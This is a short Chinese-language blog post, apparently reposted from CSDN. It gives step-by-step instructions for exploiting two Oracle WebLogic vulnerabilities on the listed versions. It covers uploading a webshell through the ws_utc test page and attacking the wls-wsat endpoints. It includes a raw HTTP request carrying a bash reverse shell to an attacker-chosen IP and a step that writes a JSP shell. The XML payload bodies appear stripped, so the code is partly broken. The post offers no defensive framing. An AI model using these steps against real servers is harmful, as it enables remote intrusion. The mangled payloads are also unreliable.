Weblogic漏洞利用
阅读原文时间:2023年07月09日阅读:2

Weblogic漏洞

受影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

漏洞存在前提

后台base_domain设置中启用web服务测试页

利用漏洞方法

  1. 访问

    http://xxx.com/ws_utc/config.do

  2. 设置Work Home Dir为

    /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,然后提交。

  1. 点击"安全",添加,弹出登录框,点击“浏览”上传webshell并抓包

  2. 找到响应包中的时间戳

    访问http://xxx.com/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

受影响版本

10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0
  1. 初步漏洞判断

    /wls-wsat/CoordinatorPortType
    /wls-wsat/RegistrationPortTypeRPC
    /wls-wsat/ParticipantPortType
    /wls-wsat/RegistrationRequesterPortType
    /wls-wsat/CoordinatorPortType11
    /wls-wsat/RegistrationPortTypeRPC11
    /wls-wsat/ParticipantPortType11
    /wls-wsat/RegistrationRequesterPortType11

  1. 反弹shell (发送数据xml时,反弹shell语句,要进行编码。)

    payload:

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: 192.168.74.154:7001
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/hAccept-Encoding: gzip, deflate
    Accept: /
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: text/xml
    Content-Length: 639

    /bin/bash -c bash -i >& /dev/tcp/接收shell的ip/1234 0>&1

  2. 写入shell

    servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp ]]>

访问写入文件:

https://blog.csdn.net/csacs/article/details/87122472